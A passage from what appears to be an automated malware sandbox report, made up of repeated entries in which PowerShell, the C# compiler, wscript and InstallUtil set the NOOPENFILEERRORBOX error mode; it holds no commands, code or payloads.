Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
